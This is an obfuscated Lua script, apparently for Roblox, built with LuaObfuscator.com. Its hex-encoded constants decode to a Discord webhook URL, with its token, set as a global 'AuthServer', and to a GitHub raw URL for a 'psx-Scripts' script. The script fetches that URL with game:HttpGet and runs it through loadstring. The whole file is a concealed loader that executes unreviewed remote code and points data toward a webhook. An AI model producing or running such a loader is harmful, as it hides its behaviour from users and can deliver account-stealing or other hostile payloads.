--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v68=v2(v0(v20,16));if v19 then local v74=v5(v68,v19);v19=nil;return v74;else return v68;end end end);local function v21(v22,v23,v24)if v24 then local v69=(v22/((1893 -(109 + 1782))^(v23-((386 + 861) -((527 -209) + 928)))))%((834 -((283 -103) + (1556 -904)))^(((v24-(2 -1)) -(v23-(672 -(600 + 71)))) + (504 -(466 + 37))));return v69-(v69%(1913 -(1698 + 214)));else local v70=(1 + 1)^(v23-((1546 -(948 + 597)) + 0));return (((v22%(v70 + v70))>=v70) and (1 -0)) or (0 + 0);end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + (2 -0));v18=v18 + (1853 -(1131 + 720));return (v40 * 256) + v39;end local function v27()local v41=0 -0;local v42;local v43;local v44;local v45;while true do if (v41==(1248 -((2469 -(360 + 1555)) + 693))) then return (v45 * (3711805 + 13065411)) + (v44 * 65536) + (v43 * (921 -(58 + 607))) + v42;end if (v41==(0 + 0)) then v42,v43,v44,v45=v1(v16,v18,v18 + (4 -1));v18=v18 + ((11 -5) -2);v41=(1 + 1) -1;end end end local function v28()local v46=v27();local v47=v27();local v48=3 -2;local v49=(v21(v47,3 -2,1351 -(890 + 441)) * ((2 + 0)^(111 -(47 + 32)))) + v46;local v50=v21(v47,21,31);local v51=((v21(v47,61 -29)==(1 + 0)) and  -(1887 -(1834 + 52))) or (1 + 0);if (v50==(1176 -(908 + 72 + 196))) then if (v49==0) then return v51 * (165 -(8 + 157));else v50=1 -0;v48=1151 -(47 + (2088 -984));end elseif (v50==((1566 + 3527) -3046)) then return ((v49==(0 -0)) and (v51 * (((1870 -(1321 + 502)) -(4 + 42))/0))) or (v51 * NaN);end return v8(v51,v50-(1757 -(95 + 639))) * (v48 + (v49/(((2 -1) + 1)^(31 + 21))));end local function v29(v30)local v52=0 -0;local v53;local v54;while true do if (v52==((61 + 297) -(217 + 140))) then v53=v3(v16,v18,(v18 + v30) -(520 -(297 + 222)));v18=v18 + v30;v52=1 + 1;end if (v52==(1373 -(124 + 1249))) then v53=nil;if  not v30 then local v82=159 -(88 + (2043 -(1813 + 159)));while true do if (v82==(1674 -(642 + 1032))) then v30=v27();if (v30==(0 -0)) then return "";end break;end end end v52=1719 -((189 -45) + 1574);end if (3==v52) then return v6(v54);end if (v52==(1 + 1)) then v54={};for v75=1 + 0, #v53 do v54[v75]=v2(v1(v3(v53,v75,v75)));end v52=4 -(1 -0);end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=0 + 0;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v55~=3) then else v62=nil;v63=nil;v55=4;end if (v55==2) then v60=nil;v61=nil;v55=7 -4;end if ((0 -0)==v55) then v56=0 -0;v57=nil;v55=3 -2;end if (1==v55) then v58=nil;v59=nil;v55=2;end if (v55==4) then while true do if (v56~=1) then else local v93=0 + 0;while true do if (v93==(0 -0)) then local v104=0;while true do if (v104==(180 -(102 + 77))) then v93=1;break;end if (0==v104) then v59=nil;v60=nil;v104=1;end end end if (v93==(1301 -(408 + 892))) then v56=2;break;end end end if (v56==0) then v57=0 -0;v58=nil;v56=1 + 0;end if (v56==(4 -2)) then v61=nil;v62=nil;v56=3;end if (v56==(1758 -(976 + 779))) then v63=nil;while true do local v98=0 -0;local v99;while true do if ((0 + 0)~=v98) then else v99=0 -0;while true do if (v99==(0 -0)) then local v107=0;local v108;while true do if (v107~=0) then else v108=873 -(297 + 576);while true do if (v108~=(0 + 0)) then else local v134=0 + 0;while true do if (v134~=(0 -0)) then else if (v57==(1 -0)) then local v142=749 -(247 + 502);local v143;while true do if (0~=v142) then else v143=0;while true do if (v143==2) then v57=2;break;end if (v143==1) then local v165=0;while true do if (v165==(1 + 0)) then v143=2;break;end if (v165==(1273 -(371 + 902))) then local v169=213 -(73 + 140);while true do if (v169~=(1367 -(126 + 1241))) then else for v178=1 + 0,v62 do local v179=0;local v180;local v181;local v182;local v183;while true do if (v179~=(3 -1)) then else while true do if (1~=v180) then else v183=nil;while true do if (v181==(0 + 0)) then local v196=0;local v197;local v198;while true do if (v196~=1) then else while true do if (v197==(0 + 0)) then v198=0 -0;while true do if (v198==(0 + 0)) then local v208=0 -0;local v209;while true do if (v208==(0 + 0)) then v209=1991 -(387 + 1604);while true do if (v209~=(0 -0)) then else local v214=1481 -(611 + 870);while true do if (v214==1) then v209=1;break;end if (v214==(0 + 0)) then v182=v25();v183=nil;v214=3 -2;end end end if (1==v209) then v198=846 -(534 + 311);break;end end break;end end end if (v198==(1485 -(691 + 793))) then v181=1 -0;break;end end break;end end break;end if (v196~=0) then else v197=0;v198=nil;v196=1;end end end if (v181==1) then if (v182==1) then v183=v25()~=(0 -0);elseif (v182==(5 -3)) then v183=v28();elseif (v182~=3) then else v183=v29();end v63[v178]=v183;break;end end break;end if (0==v180) then local v187=0;local v188;while true do if (v187~=(0 + 0)) then else v188=0;while true do if (v188==(0 -0)) then local v204=0;while true do if (v204~=(1821 -(568 + 1252))) then else v188=1;break;end if (v204~=(1686 -(1259 + 427))) then else v181=0 + 0;v182=nil;v204=1;end end end if ((1540 -(1100 + 439))==v188) then v180=1;break;end end break;end end end end break;end if (v179==0) then v180=0;v181=nil;v179=733 -(667 + 65);end if (1~=v179) then else v182=nil;v183=nil;v179=2 + 0;end end end v61[7 -4]=v25();v169=510 -(505 + 4);end if (v169~=1) then else v165=1;break;end end end end end if (v143~=0) then else v62=v27();v63={};v143=1603 -(76 + 1526);end end break;end end end if (v57==(0 -0)) then local v144=0 -0;local v145;local v146;while true do if (v144~=(31 -(25 + 6))) then else v145=1165 -(297 + 868);v146=nil;v144=1;end if (v144==(1 + 0)) then while true do if ((0 -0)~=v145) then else v146=0 + 0;while true do if (0==v146) then local v170=0 + 0;while true do if (v170==(1 + 0)) then v146=1;break;end if (v170==0) then v58={};v59={};v170=1 -0;end end end if (v146~=(4 -3)) then else local v171=0;while true do if (v171==1) then v146=2;break;end if (0~=v171) then else v60={};v61={v58,v59,nil,v60};v171=1;end end end if (v146==(1398 -(66 + 1330))) then v57=1 + 0;break;end end break;end end break;end end end v134=2 -1;end if (v134~=1) then else v108=332 -(83 + 248);break;end end end if (v108~=(3 -2)) then else v99=1;break;end end break;end end end if (v99~=1) then else if (v57==(2 + 0)) then local v109=0;while true do local v129=0 + 0;while true do if (v129==(0 + 0)) then if (v109~=1) then else local v135=271 -(260 + 11);while true do if (v135~=0) then else for v153=1,v27() do v60[v153]=v27();end return v61;end end end if ((1496 -(68 + 1428))~=v109) then else local v136=0;while true do if ((0 + 0)==v136) then local v147=0;while true do if (v147~=1) then else v136=1 + 0;break;end if (v147~=(0 -0)) then else for v159=292 -(143 + 148),v27() do local v160=0;local v161;local v162;while true do if (v160==1) then while true do if (v161==0) then v162=v25();if (v21(v162,100 -(21 + 78),780 -(661 + 118))~=(0 -0)) then else local v173=0 + 0;local v174;local v175;local v176;local v177;while true do if ((1987 -(910 + 1075))==v173) then while true do if (v174==(4 -1)) then if (v21(v176,3 + 0,3)==(1541 -(1428 + 112))) then v177[1481 -(494 + 983)]=v63[v177[4]];end v58[v159]=v177;break;end if (v174~=(2 -1)) then else local v185=0 + 0;while true do if (v185==0) then v177={v26(),v26(),nil,nil};if (v175==(0 -0)) then local v200=0;local v201;local v202;local v203;while true do if ((1 + 0)==v200) then v203=nil;while true do if (v201==1) then while true do if (v202~=0) then else v203=0;while true do if (v203~=0) then else v177[4 -1]=v26();v177[4]=v26();break;end end break;end end break;end if (v201==(614 -(231 + 383))) then v202=0 + 0;v203=nil;v201=1 + 0;end end break;end if (v200~=0) then else v201=0 -0;v202=nil;v200=401 -(282 + 118);end end elseif (v175==(1058 -(140 + 917))) then v177[3 + 0]=v27();elseif (v175==2) then v177[3 + 0]=v27() -(2^(2007 -(334 + 1657)));elseif (v175==(2 + 1)) then local v207=1210 -(1116 + 94);while true do if (v207~=(0 + 0)) then else v177[6 -3]=v27() -(2^16);v177[4]=v26();break;end end end v185=1;end if (1==v185) then v174=2;break;end end end if (v174~=0) then else local v186=0;while true do if (v186~=0) then else local v195=1949 -(1559 + 390);while true do if ((765 -(600 + 164))~=v195) then else v186=1;break;end if (v195==(0 -0)) then v175=v21(v162,2,3);v176=v21(v162,4 + 0,6);v195=1;end end end if (v186==(1 + 0)) then v174=1 + 0;break;end end end if (v174==2) then if (v21(v176,1,1 -0)~=(1532 -(528 + 1003))) then else v177[2]=v63[v177[2 -0]];end if (v21(v176,2,2)==1) then v177[1 + 2]=v63[v177[7 -4]];end v174=211 -(194 + 14);end end break;end if (v173==0) then v174=0 + 0;v175=nil;v173=1;end if (v173==1) then v176=nil;v177=nil;v173=2;end end end break;end end break;end if (v160==0) then local v168=0;while true do if (v168~=1) then else v160=1;break;end if (v168==0) then v161=0 + 0;v162=nil;v168=1;end end end end end for v163=1,v27() do v59[v163-(1 + 0)]=v33();end v147=1;end end end if (v136==1) then v109=1 + 0;break;end end end break;end end end end break;end end break;end end end break;end end break;end end end local function v34(v35,v36,v37)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v35[1];v66=v35[2];v64=1;end if (v64==1) then v67=v35[3];return function(...)local v77=1;local v78= -1;local v79={...};local v80=v12("#",...) -1;local function v81()local v83=v65;local v84=v66;local v85=v67;local v86=v32;local v87={};local v88={};local v89={};for v94=207 -(166 + 41),v80 do if ((v94>=v85) or (1667>=(5115 -3172))) then v87[v94-v85]=v79[v94 + 1 + 0 + 0];else v89[v94]=v79[v94 + 1];end end local v90=(v80-v85) + 1 + 0;local v91;local v92;while true do local v95=0;while true do if (((2305 + 583 + 1180)>(3032 + 272)) and (v95==(0 + 0))) then v91=v83[v77];v92=v91[1 + 0];v95=1 -0;end if ((v95==1) or ((2689 + 1048)==(9140 -6039))) then if ((2181<=(1884 + 2374)) and (v92<=(470 -(61 + 406)))) then if (((3748 -(12 + 14))>819) and (v92<=1)) then if ((v92>(0 + 0)) or ((3691 -(370 + (2918 -1757)))>(688 + 2024))) then v89[v91[1 + 1]]=v91[(18 -8) -7];else v89[v91[4 -2]]=v37[v91[3 + 0]];end elseif ((v92==2) or (869>((2383 + 2642) -(842 + 836)))) then local v114=0 -(0 + 0);local v115;local v116;local v117;local v118;while true do if ((v114==(2 -1)) or (183>=(970 + 1572 + 155))) then v117=nil;v118=nil;v114=1 + 1;end if ((4802>=(1271 + 3274)) and (v114==(661 -((756 -(102 + 40)) + 47)))) then v115=0 + 0;v116=nil;v114=1 + 0;end if (((446 + 3847)>=3178) and (v114==(999 -(915 + 82)))) then while true do if (((1918 -(401 + 315))<(2349 -1052)) and (v115==0)) then v116=0;v117=nil;v115=1 -0;end if (((887 + 3799)>(1944 -((1866 -563) + 312))) and (v115==(1 + (0 -0)))) then v118=nil;while true do if ((v116==((5656 -4026) -(260 + 1369))) or ((909 -(549 + 17))==(6097 -1446))) then v89[v117 + 1 + 0 + 0 + 0]=v118;v89[v117]=v118[v91[3 + 1]];break;end if ((v116==(736 -(198 + 538))) or ((911 + 38)>(6393 -2591))) then local v151=(0 -0) + (1343 -(40 + 1303));while true do if (((2352 + 30)>=1728) and (v151==(969 -(624 + 344)))) then v116=1 -0;break;end if ((v151==(0 + 0)) or (191==(4408 -(499 + 329)))) then local v157=1438 -(298 + 1140);while true do if ((3705>=3117) and (v157==(2 -1))) then v151=(1862 -1040) -(788 + (1495 -(113 + 1349)));break;end if (((4703 -(7564 -4650))>(1813 -473)) and (v157==(0 + 0))) then v117=v91[1535 -((2977 -1744) + 300)];v118=v89[v91[3]];v157=3 -(413 -(31 + 380));end end end end end end break;end end break;end end else do return;end end elseif ((v92<=(959 -(289 + 665))) or ((2030 -(757 + 489))>(5726 -(1570 + 51)))) then if ((v92>(1 + 3)) or ((2949 + 1281 + 709)==(2993 + 988))) then v89[v91[(25 -17) -6]][v91[5 -2]]=v91[255 -(17 + 38 + 196)];else local v121=0 -0;local v122;local v123;local v124;local v125;local v126;while true do if ((v121==(2 + 0)) or ((9439 -6359)==(5764 -(392 + 53 + 382)))) then v126=nil;while true do if (((279 -(178 + 7))==(169 -75)) and ((2 -1)==v122)) then local v137=0;local v138;while true do if ((v137==0) or (((2364 -(325 + 588)) + 2221 + 35)<(539 + 859))) then v138=0 -0;while true do if ((2234==(2904 -(17 + 651 + 2))) and (v138==(44 -(38 + 6)))) then v78=(v125 + v123) -(1 + 0);v126=0;v138=1;end if (((2 -1)==v138) or ((3528 -2189)==3302)) then v122=1 + 1;break;end end break;end end end if ((v122==(1 + 1)) or ((1315 -1029)<=147)) then for v140=v123,v78 do local v141=0 + 0;while true do if ((v141==(0 -0)) or ((6151 -4914)>=(1256 + 2170))) then v126=v126 + ((2047 -657) -(87 + 1302));v89[v140]=v124[v126];break;end end end break;end if (((0 + 0)==v122) or ((5475 -(469 + 348))<(294 + 2559))) then local v139=0 + 0;while true do if ((2415<(2878 + 1108)) and (v139==1)) then v122=1 + 0;break;end if ((v139==(0 + 0 + 0)) or ((4636 -(1773 + 151))>=(1120 + 2477))) then local v152=0 + 0;while true do if (((684 + 845)<=(2135 -(14 + 486))) and (v152==(1 + 0 + 0))) then v139=3 -2;break;end if ((v152==(0 -0)) or ((6058 -(269 + 1456))==(5848 -(481 + 1167)))) then v123=v91[1 + 1];v124,v125=v86(v89[v123](v13(v89,v123 + 1 + 0,v91[1574 -((2830 -(101 + 1500)) + (795 -453))])));v152=733 -((1363 -(210 + 1072)) + 651);end end end end end end break;end if (((8158 -6191)<2359) and (v121==(1 + 0))) then local v130=0 -0;while true do if (((6354 -(1714 + 487))>=(4133 -706)) and (v130==(4 -3))) then v121=2 -0;break;end if ((v130==(668 -(651 + 17))) or (4519==2445)) then v124=nil;v125=nil;v130=(1 -0) -0;end end end if ((v121==(0 -0)) or (2895<(2 + (1183 -(717 + 336))))) then local v131=45 -(5 + (111 -71));while true do if (((191 + 30)<(8958 -5096)) and (v131==(0 + 0))) then v122=0 -0;v123=nil;v131=1;end if ((v131==(1 + 0)) or (4324<(515 + 3018))) then v121=713 -(639 + 73);break;end end end end end elseif (((2331 -1422)==(2123 -1214)) and (v92==6)) then local v127=0;local v128;while true do if (((2971 + 423)==(4131 -(273 + 464))) and (v127==(0 -0))) then v128=v91[7 -5];v89[v128]=v89[v128](v13(v89,v128 + (44 -(22 + 21)),v78));break;end end else v89[v91[3 -1]]();end v77=v77 + (3 -2);break;end end end end A,B=v32(v11(v81));if  not A[1] then local v96=0;local v97;while true do if (v96==0) then v97=v35[4][v77] or "?";error("Script error at ["   .. v97   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!093O0003023O005F472O033O004B657903083O004O376F6D6554030A3O004175746853657276657203793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313037353734373135303836313935393230382F783472594530484664637536764D63656958434E5166356D2O6F632D754F69326C4F634D36456B6D533166344A48455A6E444B6C6E59503975745165386F5A357155652D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073782D536372697074732F70737873632F6D61696E2F7363726970742E6C7561000C3O00124O00013O0030053O0002000300124O00013O0030053O0004000500124O00063O00122O000100073O002002000100010008001201000300094O0004000100034O00065O00022O00073O000100012O00033O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
